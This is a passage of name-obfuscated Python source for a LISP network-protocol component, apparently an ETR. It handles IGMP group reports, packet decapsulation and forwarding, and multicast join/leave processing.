if 80 - 80: OoooooooOO + oooO0oo0oOOOO
if 95 - 95: o0oo0o / iiiiIi11i * o0oo0o - OoooooooOO * OoooooooOO % ooOO00oOo
if 43 - 43: OoO0O00 . o0oo0o
if 12 - 12: o0oo0o + II11iiII + OoOO0ooOOoo0O . oooO0oo0oOOOO / o0000oOoOoO0o
if ( iIiI1I1ii1I1 . find ( "224.0.0." ) != - 1 ) :
lisp . lprint ( "Suppress registration for link-local groups" )
continue
if 29 - 29: oooO0oo0oOOOO . Oo - II111iiii
if 68 - 68: iIii1I11I1II1 + II111iiii / iiiiIi11i
if 91 - 91: oOo0O0Ooo % iIii1I11I1II1 . oo
if 70 - 70: OoOO0ooOOoo0O % II111iiii % O0 . i1IIi / o0oo0o
if 100 - 100: oOoO0oo0OOOo * i11iIiiIii % iiiiIi11i / OoO0O00 / Oo + oOoO0oo0OOOo
if 59 - 59: o0oo0o - oooO0oo0oOOOO
if 14 - 14: iIii1I11I1II1 - iIii1I11I1II1
if 5 - 5: oooO0oo0oOOOO
if ( iiiI1IiIIii == 0 ) :
i1iIi1IIiIII1 . append ( [ None , iIiI1I1ii1I1 , II1i111 ] )
lisp . lprint ( "IGMPv3 {} (*, {})" . format ( lisp . bold ( O0000oO0o00 , False ) ,
lisp . bold ( iIiI1I1ii1I1 , False ) ) )
if 84 - 84: II111iiii * iiiiIi11i * II111iiii % oooO0oo0oOOOO / oo
if 100 - 100: oooO0oo0oOOOO . o0000oOoOoO0o - iIii1I11I1II1 . i11iIiiIii / II111iiii
if 71 - 71: o0oo0o * OoO0O00 . OoOO0ooOOoo0O
if 49 - 49: oooO0oo0oOOOO * O0 . oooO0oo0oOOOO
if 19 - 19: II111iiii - oooO0oo0oOOOO
for OOOOo000o00OO in range ( iiiI1IiIIii ) :
if ( len ( iii ) < iI1i1IiIIIIi ) : return
IIIIiii = struct . unpack ( III1II1i , iii [ : iI1i1IiIIIIi ] ) [ 0 ]
i1OOO0000oO . address = socket . ntohl ( IIIIiii )
Oo0 = i1OOO0000oO . print_address_no_iid ( )
i1iIi1IIiIII1 . append ( [ Oo0 , iIiI1I1ii1I1 , II1i111 ] )
lisp . lprint ( "{} ({}, {})" . format ( O0000oO0o00 ,
lisp . green ( Oo0 , False ) , lisp . bold ( iIiI1I1ii1I1 , False ) ) )
iii = iii [ iI1i1IiIIIIi : : ]
if 66 - 66: oOoO0oo0OOOo * Oo . II11iiII
if 96 - 96: OoOO0ooOOoo0O % Oo
if 57 - 57: iiiiIi11i . oo
if 6 - 6: Oo
if 39 - 39: Oo / O0 * oooO0oo0oOOOO
if 17 - 17: o0000oOoOoO0o / iIii1I11I1II1 - ooOO00oOo + oo % II11iiII
if 14 - 14: Ooo00oOo00o % oooO0oo0oOOOO + oOoO0oo0OOOo + ooOO00oOo
if 76 - 76: ooOO00oOo - i11iIiiIii + oOo0O0Ooo + II11iiII / OoooooooOO
if ( len ( i1iIi1IIiIII1 ) != 0 ) :
Ii11iI ( Oo0o0000o0o0 , i1iIi1IIiIII1 )
if 50 - 50: II111iiii - o0oo0o + iIii1I11I1II1 + iIii1I11I1II1
return
if 91 - 91: II111iiii - O0 . iIii1I11I1II1 . O0 + oOoO0oo0OOOo - II111iiii
if 26 - 26: Ooo00oOo00o
if 12 - 12: OoooooooOO / O0 + II111iiii * oOoO0oo0OOOo
if 46 - 46: II111iiii - oooO0oo0oOOOO * OoooooooOO / iiiiIi11i % oooO0oo0oOOOO
if 11 - 11: iIii1I11I1II1 . oOo0O0Ooo / oooO0oo0oOOOO % Oo
if 61 - 61: Oo - II11iiII + II11iiII
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if 2 - 2: i1IIi * iiiiIi11i - iiiiIi11i + OoooooooOO % oOo0O0Ooo / oOo0O0Ooo
def i11IiI1iiI11 ( parms , not_used , packet ) :
global I11
if 85 - 85: oOoO0oo0OOOo - oOo0O0Ooo / oOoO0oo0OOOo + II11iiII - i1I1ii1II1iII
IIii1III = parms [ 0 ]
oOo0oooo00o = parms [ 1 ]
if 94 - 94: i11iIiiIii % OoooooooOO / oo
if 24 - 24: oo * iiiiIi11i
if 85 - 85: II111iiii . Oo % II11iiII % OoOO0ooOOoo0O
if 80 - 80: iiiiIi11i * OoOO0ooOOoo0O / iIii1I11I1II1 % iiiiIi11i / iIii1I11I1II1
if 42 - 42: i1IIi / i11iIiiIii . OoO0O00 * i1I1ii1II1iII . i11iIiiIii * O0
if 44 - 44: i1IIi . oo / i11iIiiIii + oooO0oo0oOOOO
if ( lisp . lisp_is_macos ( ) == False ) :
iI111II1ii = 4 if IIii1III == "lo0" else 16
packet = packet [ iI111II1ii : : ]
if 62 - 62: i1I1ii1II1iII * iIii1I11I1II1 . oooO0oo0oOOOO - OoooooooOO * II111iiii
if 45 - 45: O0 % oo - i1I1ii1II1iII . ooOO00oOo
if 42 - 42: i1I1ii1II1iII / Ooo00oOo00o + OoO0O00 . OoO0O00 % II11iiII
if 16 - 16: i1IIi + ooOO00oOo % oOo0O0Ooo + o0000oOoOoO0o * OoO0O00
if 3 - 3: i11iIiiIii
Oo0iII1iI1IIiI = struct . unpack ( "B" , packet [ 9 ] ) [ 0 ]
if ( Oo0iII1iI1IIiI == 2 ) :
i1I1i1i ( packet )
return
if 69 - 69: OoOO0ooOOoo0O / i11iIiiIii * Ooo00oOo00o / o0oo0o
if 71 - 71: Ooo00oOo00o / II11iiII % II11iiII
if 89 - 89: OoooooooOO + i11iIiiIii / OoOO0ooOOoo0O + iIii1I11I1II1 % Oo
if 29 - 29: oOoO0oo0OOOo
if 53 - 53: i11iIiiIii . oOoO0oo0OOOo % o0000oOoOoO0o / Oo % iIii1I11I1II1
iIiIii1I1 = packet
packet , i1OOO0000oO , O0OOOOo0 , OOooO0Oo00 = lisp . lisp_is_rloc_probe ( packet , 0 )
if ( iIiIii1I1 != packet ) :
if ( i1OOO0000oO == None ) : return
lisp . lisp_parse_packet ( Oo0o0000o0o0 , packet , i1OOO0000oO , O0OOOOo0 , OOooO0Oo00 )
return
if 9 - 9: oooO0oo0oOOOO
if 48 - 48: Ooo00oOo00o + Ooo00oOo00o - OoO0O00
if 27 - 27: ooOO00oOo + oOo0O0Ooo * Oo
if 83 - 83: iIii1I11I1II1
if 72 - 72: OoOO0ooOOoo0O
if 87 - 87: i1IIi
if 48 - 48: OoO0O00 * iiiiIi11i * iIii1I11I1II1 + i11iIiiIii - OoooooooOO
II1iI = socket . ntohs ( struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ] )
if ( II1iI == lisp . LISP_DATA_PORT ) : return
packet = lisp . lisp_reassemble ( packet )
if ( packet == None ) : return
if 5 - 5: i1IIi * oOo0O0Ooo % oo . ooOO00oOo * oOoO0oo0OOOo - o0oo0o
packet = lisp . lisp_packet ( packet )
oO0OOOO0o0 = packet . decode ( True , I11 , lisp . lisp_decap_stats )
if ( oO0OOOO0o0 == None ) : return
if 67 - 67: OoO0O00 / Oo - oooO0oo0oOOOO
if 74 - 74: OoOO0ooOOoo0O * o0000oOoOoO0o - oOoO0oo0OOOo % iIii1I11I1II1
if 56 - 56: oOoO0oo0OOOo - O0
if 58 - 58: oooO0oo0oOOOO + iIii1I11I1II1
packet . print_packet ( "Receive" , True )
if 94 - 94: o0000oOoOoO0o . i1IIi
if 71 - 71: i1I1ii1II1iII + ooOO00oOo - oooO0oo0oOOOO . ooOO00oOo . oooO0oo0oOOOO + oo
if 26 - 26: O0
if 17 - 17: II111iiii
if 9 - 9: OoooooooOO + iiiiIi11i
if 33 - 33: O0
if 39 - 39: oo + OoO0O00
if 83 - 83: i1IIi
if ( lisp . lisp_decent_push_configured and
packet . inner_dest . is_multicast_address ( ) and packet . lisp_header . get_instance_id ( ) == 0xffffff ) :
if 76 - 76: o0000oOoOoO0o + iIii1I11I1II1 + oOo0O0Ooo . ooOO00oOo
i1OOO0000oO = packet . inner_source . print_address_no_iid ( )
packet . strip_outer_headers ( )
packet = packet . packet [ 28 : : ]
packet = lisp . lisp_packet_ipc ( packet , i1OOO0000oO , II1iI )
lisp . lisp_ipc ( packet , I11 , "lisp-ms" )
return
if 49 - 49: oooO0oo0oOOOO / Oo / II11iiII
if 25 - 25: oo % O0 + i1IIi - Oo
if 38 - 38: Ooo00oOo00o % o0oo0o + i11iIiiIii + i1I1ii1II1iII + Oo / i11iIiiIii
if 94 - 94: i1I1ii1II1iII - OoO0O00 + iiiiIi11i
if 59 - 59: OoOO0ooOOoo0O . oo - iIii1I11I1II1 + iIii1I11I1II1
if 56 - 56: iiiiIi11i + Oo
if ( lisp . lisp_ipc_data_plane ) :
lisp . dprint ( "Drop packet, external data-plane active" )
return
if 32 - 32: II111iiii + oOo0O0Ooo % Oo / oOo0O0Ooo + oOoO0oo0OOOo
if 2 - 2: i11iIiiIii - o0oo0o + ooOO00oOo % OoOO0ooOOoo0O * o0000oOoOoO0o
if 54 - 54: O0 - i1I1ii1II1iII . II11iiII % i1I1ii1II1iII + i1I1ii1II1iII
if 36 - 36: II11iiII % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . OoO0O00 * iiiiIi11i . OoOO0ooOOoo0O / i1IIi
lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( packet . packet ) )
if 50 - 50: o0oo0o / i1IIi % OoooooooOO
if 83 - 83: oOoO0oo0OOOo * oOoO0oo0OOOo + II11iiII
if 57 - 57: O0 - O0 . oOoO0oo0OOOo / Ooo00oOo00o / o0000oOoOoO0o
if 20 - 20: II11iiII * II111iiii - oOo0O0Ooo - iiiiIi11i * o0oo0o
packet . strip_outer_headers ( )
I1i1II1 = lisp . bold ( "Forward" , False )
if 89 - 89: ooOO00oOo / ooOO00oOo
if 1 - 1: oOoO0oo0OOOo . i11iIiiIii
if 74 - 74: O0 + OoooooooOO / iiiiIi11i / oOo0O0Ooo . oOoO0oo0OOOo % iiiiIi11i
if 34 - 34: i1IIi . oo
i11I1IIiiii = packet . inner_dest . is_mac ( )
if ( i11I1IIiiii ) :
packet . packet = lisp . lisp_mac_input ( packet . packet )
if ( packet . packet == None ) : return
I1i1II1 = lisp . bold ( "Bridge" , False )
elif ( packet . inner_version == 4 ) :
packet . packet = lisp . lisp_ipv4_input ( packet . packet )
if ( packet . packet == None ) : return
packet . inner_ttl = packet . outer_ttl
elif ( packet . inner_version == 6 ) :
packet . packet = lisp . lisp_ipv6_input ( packet )
if ( packet . packet == None ) : return
packet . inner_ttl = packet . outer_ttl
else :
lisp . dprint ( "Cannot parse inner packet header" )
return
if 85 - 85: iIii1I11I1II1
if 92 - 92: iiiiIi11i / II11iiII . oOoO0oo0OOOo
if 30 - 30: o0000oOoOoO0o . oOoO0oo0OOOo / II11iiII
if 2 - 2: oooO0oo0oOOOO % oo - o0oo0o
if 79 - 79: OoooooooOO / oOoO0oo0OOOo . O0
if ( packet . inner_dest . is_multicast_address ( ) == False ) :
ooo0O = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( ooo0O ) :
ooo0O . increment_decap_stats ( packet )
else :
lisp . dprint ( "No database-mapping found for EID {}" . format ( lisp . green ( packet . inner_dest . print_address ( ) , False ) ) )
if 79 - 79: iiiiIi11i - II111iiii
return
if 43 - 43: i1IIi + O0 % ooOO00oOo / o0000oOoOoO0o * oo
if 89 - 89: oo . OoO0O00 + oOoO0oo0OOOo . O0 % Ooo00oOo00o
if 84 - 84: OoooooooOO + o0oo0o / oo % II11iiII % oOoO0oo0OOOo * oo
if 58 - 58: ooOO00oOo - oOo0O0Ooo . i11iIiiIii % i11iIiiIii / i1IIi / iiiiIi11i
if 24 - 24: oo * i1IIi % Oo / O0 + i11iIiiIii
if 12 - 12: oOoO0oo0OOOo / o0000oOoOoO0o
if 5 - 5: OoooooooOO
if 18 - 18: oo % OoooooooOO - i1I1ii1II1iII . i11iIiiIii * OoO0O00 % o0000oOoOoO0o
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet , ed = "decap" ) == False ) : return
if 12 - 12: i1IIi / II11iiII % Oo * oooO0oo0oOOOO * O0 * iIii1I11I1II1
if 93 - 93: OoO0O00 / oOoO0oo0OOOo + i1IIi * iiiiIi11i . OoooooooOO
if 54 - 54: O0 / oooO0oo0oOOOO % Oo * i1IIi * O0
if 48 - 48: Ooo00oOo00o . iiiiIi11i % oOo0O0Ooo - oOo0O0Ooo
if 33 - 33: OoOO0ooOOoo0O % II111iiii + ooOO00oOo
i111IiI1I = "{} -> {}" . format ( packet . inner_source . print_address ( ) ,
packet . inner_dest . print_address ( ) )
if 93 - 93: i1IIi . oooO0oo0oOOOO / oo + oooO0oo0oOOOO
lisp . dprint ( "{} packet for EIDs {}: {} ..." . format ( I1i1II1 , lisp . green ( i111IiI1I , False ) ,
# OoO0O00 * iIii1I11I1II1 - ooOO00oOo . OoO0O00
lisp . lisp_format_packet ( packet . packet [ 0 : 60 ] ) ) )
if 59 - 59: ooOO00oOo - ooOO00oOo + i1I1ii1II1iII
if 32 - 32: i1IIi / OoO0O00 - O0
if 85 - 85: o0000oOoOoO0o - O0 * i11iIiiIii . i1IIi
if 20 - 20: i1I1ii1II1iII / II11iiII
if 28 - 28: Oo * OoOO0ooOOoo0O % i11iIiiIii * i1I1ii1II1iII / o0000oOoOoO0o
if ( i11I1IIiiii ) :
packet . bridge_l2_packet ( packet . inner_dest , ooo0O )
return
if 41 - 41: II11iiII - Ooo00oOo00o + o0000oOoOoO0o
if 15 - 15: OoOO0ooOOoo0O / Ooo00oOo00o + o0000oOoOoO0o
if 76 - 76: o0000oOoOoO0o + OoooooooOO / II11iiII % ooOO00oOo / oOoO0oo0OOOo
if 38 - 38: o0oo0o . i1I1ii1II1iII . oo * ooOO00oOo
if 69 - 69: Ooo00oOo00o % i11iIiiIii / o0000oOoOoO0o
if 93 - 93: Oo
if ( packet . inner_version == 6 ) :
packet . send_l2_packet ( oO0o0o0ooO0oO , oo0o0O00 )
return
if 34 - 34: iiiiIi11i - Oo * OoO0O00 / Ooo00oOo00o
if 19 - 19: oOoO0oo0OOOo
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - oOo0O0Ooo % O0 / II111iiii * i1IIi
if 66 - 66: O0
if 52 - 52: ooOO00oOo * OoooooooOO
Ii11iiI = packet . get_raw_socket ( )
if ( Ii11iiI == None ) : Ii11iiI = oOo0oooo00o
if 71 - 71: o0oo0o - Ooo00oOo00o - II11iiII
if 28 - 28: iIii1I11I1II1
if 7 - 7: Ooo00oOo00o % oooO0oo0oOOOO * oOo0O0Ooo
if 58 - 58: oooO0oo0oOOOO / OoOO0ooOOoo0O + II111iiii % i1I1ii1II1iII - OoooooooOO
packet . send_packet ( Ii11iiI , packet . inner_dest )
return
if 25 - 25: oOo0O0Ooo % OoooooooOO * OoO0O00 - i1IIi * II111iiii * iiiiIi11i
if 30 - 30: OoOO0ooOOoo0O % oOo0O0Ooo / oOoO0oo0OOOo * O0 * o0000oOoOoO0o . oo
if 46 - 46: oOo0O0Ooo - O0
if 70 - 70: OoOO0ooOOoo0O + OoO0O00 * iIii1I11I1II1 . oo * OoOO0ooOOoo0O
if 49 - 49: Ooo00oOo00o
if 25 - 25: i1I1ii1II1iII . OoooooooOO * iIii1I11I1II1 . Ooo00oOo00o / O0 + o0000oOoOoO0o
if 68 - 68: OoO0O00
if 22 - 22: II11iiII
if 22 - 22: i1I1ii1II1iII * OoOO0ooOOoo0O - OoO0O00 * O0 / i11iIiiIii
if 78 - 78: OoO0O00 * O0 / Oo + OoooooooOO + II11iiII
if 23 - 23: i1I1ii1II1iII % OoooooooOO / iIii1I11I1II1 + oOoO0oo0OOOo / i1IIi / Ooo00oOo00o
def oOoO ( lisp_raw_socket , packet , source ) :
global I11 , Oo0o0000o0o0
if 32 - 32: O0 + iiiiIi11i % OoO0O00
if 7 - 7: oOoO0oo0OOOo / Oo
if 11 - 11: oooO0oo0oOOOO * Oo / Oo - II11iiII
if 68 - 68: oo % oooO0oo0oOOOO - oooO0oo0oOOOO / oo + oOoO0oo0OOOo - OoO0O00
o0oO0o00O = packet
packet = lisp . lisp_packet ( packet [ 8 : : ] )
if ( packet . lisp_header . decode ( o0oO0o00O ) == False ) : return
if 6 - 6: OoooooooOO / i11iIiiIii / o0oo0o
if 60 - 60: oo % iiiiIi11i / Ooo00oOo00o % iiiiIi11i * i11iIiiIii / i1I1ii1II1iII
if 34 - 34: o0oo0o - II11iiII
if 25 - 25: iiiiIi11i % oo + i11iIiiIii + O0 * OoooooooOO
if 64 - 64: i1IIi
packet . outer_source = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , source ,
lisp . LISP_IPV4_HOST_MASK_LEN , 0 )
if 10 - 10: o0oo0o % O0 / oo % OoOO0ooOOoo0O
oO0OOOO0o0 = packet . decode ( False , I11 ,
lisp . lisp_decap_stats )
if ( oO0OOOO0o0 == None ) : return
if 25 - 25: II111iiii / ooOO00oOo
if 64 - 64: O0 % Oo
if 40 - 40: Ooo00oOo00o + OoOO0ooOOoo0O
if 77 - 77: i11iIiiIii % oooO0oo0oOOOO + o0oo0o % OoooooooOO - OoOO0ooOOoo0O
if 26 - 26: OoO0O00 + O0 - iIii1I11I1II1
if 47 - 47: OoooooooOO
if 2 - 2: oOo0O0Ooo % o0oo0o * OoO0O00 * oOo0O0Ooo
if ( lisp . lisp_flow_logging ) : packet . log_flow ( False )
if 65 - 65: i11iIiiIii + OoO0O00 * OoooooooOO - ooOO00oOo
packet . print_packet ( "Kernel-decap" , False )
lisp . dprint ( packet . lisp_header . print_header ( " " ) )
if 26 - 26: Ooo00oOo00o % II11iiII + II11iiII % OoOO0ooOOoo0O * i11iIiiIii / i1I1ii1II1iII
if 64 - 64: iiiiIi11i % oOo0O0Ooo / II111iiii % Oo - i1I1ii1II1iII
if 2 - 2: o0oo0o - oOoO0oo0OOOo + Ooo00oOo00o * ooOO00oOo / i1I1ii1II1iII
if 26 - 26: II11iiII * OoO0O00
if 31 - 31: OoOO0ooOOoo0O * iiiiIi11i . o0000oOoOoO0o
if 35 - 35: OoOO0ooOOoo0O
if 94 - 94: Oo / i11iIiiIii % O0
if 70 - 70: OoOO0ooOOoo0O - OoO0O00 / OoooooooOO % OoooooooOO
if ( lisp . lisp_decent_push_configured and
packet . inner_dest . is_multicast_address ( ) and packet . lisp_header . get_instance_id ( ) == 0xffffff ) :
if 95 - 95: OoooooooOO % OoooooooOO . o0000oOoOoO0o
II1iI = packet . udp_sport
packet = packet . packet [ 28 : : ]
packet = lisp . lisp_packet_ipc ( packet , source , II1iI )
lisp . lisp_ipc ( packet , I11 , "lisp-ms" )
return
if 26 - 26: iiiiIi11i + oooO0oo0oOOOO - II111iiii . II111iiii + oOoO0oo0OOOo + oOo0O0Ooo
if 68 - 68: O0
if 76 - 76: oOoO0oo0OOOo
if 99 - 99: Ooo00oOo00o
if 1 - 1: o0000oOoOoO0o * oOo0O0Ooo * ooOO00oOo + OoO0O00
if 90 - 90: o0oo0o % OoO0O00 - OoO0O00 . iIii1I11I1II1 / II11iiII + OoOO0ooOOoo0O
if 89 - 89: iiiiIi11i
if 87 - 87: i1I1ii1II1iII % OoO0O00
if 62 - 62: ooOO00oOo + Oo / i1I1ii1II1iII * i11iIiiIii
if ( packet . lisp_header . get_instance_id ( ) == 0xffffff ) :
packet = packet . packet
OOooO0Oo00 = - 1
if ( lisp . lisp_is_rloc_probe_request ( packet [ 28 ] ) ) :
OOooO0Oo00 = struct . unpack ( "B" , packet [ 8 ] ) [ 0 ] - 1
if 37 - 37: i1I1ii1II1iII
packet = packet [ 28 : : ]
lisp . lisp_parse_packet ( Oo0o0000o0o0 , packet , source , 0 , OOooO0Oo00 )
return
if 33 - 33: ooOO00oOo - O0 - ooOO00oOo
if 94 - 94: oooO0oo0oOOOO * OoOO0ooOOoo0O * OoooooooOO / Ooo00oOo00o . oooO0oo0oOOOO - Ooo00oOo00o
if 13 - 13: II11iiII / oooO0oo0oOOOO - ooOO00oOo / II11iiII . i1IIi
if 22 - 22: O0 - OoOO0ooOOoo0O + o0oo0o . o0000oOoOoO0o * i1IIi
if 26 - 26: iIii1I11I1II1 * Ooo00oOo00o . OoOO0ooOOoo0O
if 10 - 10: o0oo0o * iiiiIi11i % OoO0O00 - OoOO0ooOOoo0O % OoO0O00
if ( lisp . lisp_ipc_data_plane ) :
lisp . dprint ( "Drop packet, external data-plane active" )
return
if 65 - 65: i1I1ii1II1iII * iIii1I11I1II1 / O0 . OoOO0ooOOoo0O
if 94 - 94: OoO0O00 . Oo * i11iIiiIii - Ooo00oOo00o . i1I1ii1II1iII
if 98 - 98: II11iiII + o0000oOoOoO0o
if 52 - 52: OoO0O00 / oOo0O0Ooo - o0oo0o . i1I1ii1II1iII
if 50 - 50: iIii1I11I1II1 - i1I1ii1II1iII - OoOO0ooOOoo0O
lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( packet . packet ) )
if 60 - 60: iIii1I11I1II1 * Oo
if 71 - 71: oOo0O0Ooo % OoO0O00 % Oo
if 34 - 34: OoOO0ooOOoo0O / OoOO0ooOOoo0O % oooO0oo0oOOOO . oOo0O0Ooo / OoO0O00
if 99 - 99: Oo * oo - Oo % o0000oOoOoO0o
if ( packet . inner_dest . is_multicast_address ( ) == False ) :
ooo0O = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( ooo0O ) :
ooo0O . increment_decap_stats ( packet )
else :
lisp . dprint ( "No database-mapping found for EID {}" . format ( lisp . green ( packet . inner_dest . print_address ( ) , False ) ) )
if 40 - 40: II11iiII / oooO0oo0oOOOO / iIii1I11I1II1 + o0000oOoOoO0o
if 59 - 59: OoOO0ooOOoo0O * OoooooooOO + II11iiII . iIii1I11I1II1 / i1IIi
if 75 - 75: OoOO0ooOOoo0O . II11iiII - iIii1I11I1II1 * ooOO00oOo * i1I1ii1II1iII
if 93 - 93: Oo
if 18 - 18: Oo
if 66 - 66: iiiiIi11i * i11iIiiIii + oOo0O0Ooo / II11iiII
if 96 - 96: II11iiII + II11iiII % oooO0oo0oOOOO % II11iiII
if 28 - 28: iIii1I11I1II1 + oOo0O0Ooo . Ooo00oOo00o % i11iIiiIii
if 58 - 58: OoOO0ooOOoo0O / OoooooooOO % iiiiIi11i + ooOO00oOo
if 58 - 58: O0
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet , ed = "decap" ) == False ) : return
if 91 - 91: i1I1ii1II1iII / oOoO0oo0OOOo . i1I1ii1II1iII - Ooo00oOo00o + oOoO0oo0OOOo
if 72 - 72: o0000oOoOoO0o . oooO0oo0oOOOO * oOoO0oo0OOOo / oOoO0oo0OOOo / i1I1ii1II1iII
i111IiI1I = "{} -> {}" . format ( packet . inner_source . print_address ( ) ,
packet . inner_dest . print_address ( ) )
if 13 - 13: i1IIi
lisp . dprint ( "{} packet for EIDs {}: {} ..." . format ( lisp . bold ( "NAT-Forward" , False ) , lisp . green ( i111IiI1I , False ) ,
# oOoO0oo0OOOo
lisp . lisp_format_packet ( packet . packet [ 0 : 60 ] ) ) )
if 86 - 86: Oo
if 51 - 51: ooOO00oOo - i11iIiiIii * oo
if 95 - 95: II11iiII % oOoO0oo0OOOo + Ooo00oOo00o % Oo
if 36 - 36: O0 / i1IIi % II111iiii / i1I1ii1II1iII
if 96 - 96: OoO0O00 / iiiiIi11i . II111iiii . OoO0O00
if ( packet . inner_version == 6 ) :
packet . send_l2_packet ( oO0o0o0ooO0oO , oo0o0O00 )
return
if 91 - 91: II111iiii . II11iiII + Ooo00oOo00o
if 8 - 8: II11iiII * OoO0O00 / i1I1ii1II1iII - ooOO00oOo - OoooooooOO
if 100 - 100: iiiiIi11i . iIii1I11I1II1 . iIii1I11I1II1
if 55 - 55: iiiiIi11i
if 37 - 37: oooO0oo0oOOOO / i11iIiiIii / OoO0O00
Ii11iiI = packet . get_raw_socket ( )
if ( Ii11iiI == None ) : Ii11iiI = lisp_raw_socket
if 97 - 97: o0oo0o . OoOO0ooOOoo0O / oo
if 83 - 83: OoOO0ooOOoo0O - oOoO0oo0OOOo * iiiiIi11i
if 90 - 90: OoO0O00 * oo
if 75 - 75: oOoO0oo0OOOo - oOo0O0Ooo * i11iIiiIii . OoooooooOO - OoO0O00 . OoOO0ooOOoo0O
packet . send_packet ( Ii11iiI , packet . inner_dest )
return
if 6 - 6: OoOO0ooOOoo0O * iiiiIi11i / OoooooooOO % o0000oOoOoO0o * Ooo00oOo00o
if 28 - 28: oooO0oo0oOOOO * oo % oooO0oo0oOOOO
if 95 - 95: O0 / OoOO0ooOOoo0O . o0oo0o
if 17 - 17: OoOO0ooOOoo0O
if 56 - 56: Oo * Ooo00oOo00o + OoOO0ooOOoo0O
if 48 - 48: oooO0oo0oOOOO * ooOO00oOo % o0oo0o - OoOO0ooOOoo0O
if 72 - 72: i1IIi % Oo % oooO0oo0oOOOO % iiiiIi11i - iiiiIi11i
if 97 - 97: Ooo00oOo00o * O0 / Ooo00oOo00o * ooOO00oOo * OoO0O00
def iiI1iiii1Iii ( group , joinleave ) :
O00ooOo = None
for I1111IIi in lisp . lisp_group_mapping_list . values ( ) :
ii1 = oO00oOo0OOO ( group , I1111IIi )
if ( ii1 == - 1 ) : continue
if ( O00ooOo == None or ii1 > O00ooOo . mask_len ) : O00ooOo = I1111IIi
if 94 - 94: i11iIiiIii % iiiiIi11i + OoO0O00 + iiiiIi11i
if ( O00ooOo == None ) : return
if 33 - 33: oooO0oo0oOOOO . OoO0O00 / iIii1I11I1II1
iiiIiIiI = [ ]
for IIiIi1iI in O00ooOo . sources :
iiiIiIiI . append ( [ IIiIi1iI , group , joinleave ] )
if 30 - 30: i1I1ii1II1iII / ooOO00oOo . i1I1ii1II1iII
if 17 - 17: OoO0O00 + OoooooooOO * OoooooooOO
Ii11iI ( Oo0o0000o0o0 , iiiIiIiI )
return
if 5 - 5: o0oo0o % OoooooooOO . oOo0O0Ooo
if 67 - 67: oOoO0oo0OOOo + o0000oOoOoO0o
if 72 - 72: oooO0oo0oOOOO % Ooo00oOo00o
if 93 - 93: iIii1I11I1II1 + i11iIiiIii . Ooo00oOo00o . i1IIi % oo % Oo
if 74 - 74: oOo0O0Ooo / i1IIi % OoooooooOO
if 52 - 52: oooO0oo0oOOOO % Oo
if 25 - 25: OoOO0ooOOoo0O / OoOO0ooOOoo0O % OoooooooOO - oOoO0oo0OOOo * iiiiIi11i
if 23 - 23: i11iIiiIii
if 100 - 100: iiiiIi11i + O0 . oo + i1IIi - oOo0O0Ooo + Ooo00oOo00o
if 65 - 65: II111iiii / OoO0O00
if 42 - 42: i11iIiiIii . O0
if 75 - 75: o0oo0o + iIii1I11I1II1
if 19 - 19: oo + i11iIiiIii . oooO0oo0oOOOO - OoOO0ooOOoo0O / o0000oOoOoO0o + Ooo00oOo00o
if 38 - 38: OoO0O00 / iIii1I11I1II1 * iIii1I11I1II1 % oOoO0oo0OOOo
if 92 - 92: OoOO0ooOOoo0O / O0 * oo - OoOO0ooOOoo0O
if 99 - 99: i11iIiiIii % OoooooooOO
def o0000O00oO0O ( ) :
global Oo0o0000o0o0
if 3 - 3: iIii1I11I1II1 % oOoO0oo0OOOo . II11iiII % OoOO0ooOOoo0O
lisp . lisp_set_exception ( )
if 40 - 40: Oo * o0000oOoOoO0o . o0000oOoOoO0o + II111iiii + OoooooooOO
i11I1Iii1I = socket . htonl
iii1 = [ i11I1Iii1I ( 0x46000020 ) , i11I1Iii1I ( 0x9fe60000 ) , i11I1Iii1I ( 0x0102d7cc ) ,
i11I1Iii1I ( 0x0acfc15a ) , i11I1Iii1I ( 0xe00000fb ) , i11I1Iii1I ( 0x94040000 ) ]
if 93 - 93: iiiiIi11i % i1IIi
oOO0 = ""
for OO in iii1 : oOO0 += struct . pack ( "I" , OO )
if 61 - 61: OoOO0ooOOoo0O . OoOO0ooOOoo0O - ooOO00oOo
if 62 - 62: i1I1ii1II1iII . i1I1ii1II1iII
if 22 - 22: Oo / Oo - o0000oOoOoO0o % OoOO0ooOOoo0O . II11iiII + oooO0oo0oOOOO
if 64 - 64: i1IIi % oOoO0oo0OOOo / o0000oOoOoO0o % OoooooooOO
if 24 - 24: o0oo0o + OoooooooOO . oooO0oo0oOOOO / oOo0O0Ooo / OoOO0ooOOoo0O
while ( True ) :
ooOoo = commands . getoutput ( "ls join-*" ) . replace ( "join-" , "" )
ooOoo = ooOoo . split ( "\n" )
if 91 - 91: Ooo00oOo00o . i1I1ii1II1iII % OoO0O00 - i1I1ii1II1iII . iiiiIi11i % i11iIiiIii
for ooO in ooOoo :
if ( lisp . lisp_valid_address_format ( "address" , ooO ) == False ) :
continue
if 25 - 25: iIii1I11I1II1
if 63 - 63: Oo
oO0oOOOooo = ( ooO . find ( ":" ) != - 1 )
if 6 - 6: iIii1I11I1II1 - iIii1I11I1II1 % Ooo00oOo00o / iIii1I11I1II1 * o0oo0o
if 3 - 3: II11iiII . oooO0oo0oOOOO / OoO0O00
if 89 - 89: OoooooooOO . iIii1I11I1II1 . OoO0O00 * iIii1I11I1II1 - o0oo0o
if 92 - 92: OoooooooOO - oOoO0oo0OOOo - OoooooooOO % oo % oo % iIii1I11I1II1
O00oo0oOoO00O = os . path . exists ( "leave-{}" . format ( ooO ) )
lisp . lprint ( "Internal {} group {}" . format ( "leaving" if O00oo0oOoO00O else "joining" , ooO ) )
if 7 - 7: II111iiii * Oo . OoO0O00 / oo
if 43 - 43: o0000oOoOoO0o + i1I1ii1II1iII + i1IIi - oOo0O0Ooo + Ooo00oOo00o
if 54 - 54: oOoO0oo0OOOo + oOoO0oo0OOOo + OoOO0ooOOoo0O % i1IIi % i11iIiiIii
if 100 - 100: oOoO0oo0OOOo
